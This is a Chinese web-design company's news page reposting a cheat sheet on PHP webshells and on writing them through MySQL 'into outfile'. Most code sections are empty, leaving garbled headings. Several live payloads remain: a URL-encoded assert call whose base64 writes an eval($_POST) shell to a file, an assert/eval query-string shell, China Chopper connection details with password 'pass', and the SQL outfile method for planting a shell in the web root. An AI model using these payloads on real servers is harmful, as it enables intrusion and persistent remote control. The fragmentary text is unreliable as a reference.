网站建设资讯

NEWS

网站建设资讯

PHP木马小结与SQL语句写木马-创新互联

这期内容当中小编将会给大家带来有关PHP木马小结与SQL语句写木马,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

专注于为中小企业提供做网站、网站建设服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业梁溪免费做网站提供优质的服务。我们立足成都,凝聚了一批互联网行业人才,有力地推动了上1000家企业的稳健成长,帮助中小企业通过网站建设实现规模扩充和转变。

  一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:


二、编码的替换的类型:


//会生成


//php在html内部的一种嵌入方式




三、其他类型:


//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
     //菜刀连接 躲避检测 密码pass 

//菜刀提交  http://192.168.1.5/x.php?x=lostwolf  脚本类型:php  密码为 pass

四、下载类型:

 
 //显示某文件
 //运行远程shell

五、无关键函数类型:



http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass

六、补充知识点:

SQL写一句话(MySQL):

select "" into outfile "/home/webaccount/projectname/www/*.php"
#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以

上述就是小编为大家分享的PHP木马小结与SQL语句写木马了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注创新互联行业资讯频道。


标题名称:PHP木马小结与SQL语句写木马-创新互联
URL链接:http://cdweb.net/article/dihsgd.html